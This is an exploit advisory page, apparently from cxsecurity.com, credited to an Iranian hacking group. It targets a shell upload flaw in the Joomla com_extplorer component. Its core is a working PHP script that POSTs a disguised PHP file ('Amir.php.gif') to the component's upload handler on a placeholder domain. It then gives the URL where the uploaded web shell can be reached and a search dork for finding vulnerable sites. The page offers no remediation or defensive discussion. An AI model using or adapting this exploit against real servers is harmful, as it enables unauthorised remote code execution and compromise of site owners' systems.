Joomla com_extplorer Components shell upload Vulnerability

2013.06.16
Credit: Am!r
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

################################# # ISlamic Republic Of Iran Security Team # Www.IrIsT.Ir ################################# # Exploit Title : joomla com_extplorer Components shell upload Vulnerability # Author : IrIsT Security & Researcher Team # Discovered By : Am!r # Home : http://IrIsT.Ir - http://IrIsT.Ir/forum # Facebook Page : http://www.facebook.com/pages/IrIsT-Hacking-Security-Researcher-Group/488307267857573 # Software Link : http://www.joomla.org # Security Risk : High # Tested on : Linux # Dork : inurl:administrator/components/com_extplorer ################################# Exploit : Post.php <?php $uploadfile="Amir.php.gif"; $ch = curl_init("http://www.exemple.com/administrator/components/com_extplorer/uploadhandler.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> Shell Access : http://www.exemple.com/images/stories/Amir.php.gif ################################# # Greats : B3HZ4D - C0dex - TaK.FaNaR - F@rid - Beni_Vanda - dr.koderz - Mr Zer0 - Smartprogrammer - z3r0 # sajjad13and11 - silent - Bl4ck M4n - AHAAD - ARTA - Dj.TiniVini - E2MA3N - Immortal Boy - IR Anonymous # Mikili - Mr.F@RDIN - Net.W0lf - skote_vahshat - Net.W0lf - MedRiK - 4xp3r-bh - Sokout - mehdiv # & All Members In IrIsT.Ir ################################# #Tnx To : PacketstormSecurity.Org - Cxsecurity.Com - 1337day.com - exploit-db.com #################################

References:

http://www.facebook.com/pages/IrIsT-Hacking-Security-Researcher-Group/488307267857573
http://IrIsT.Ir


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top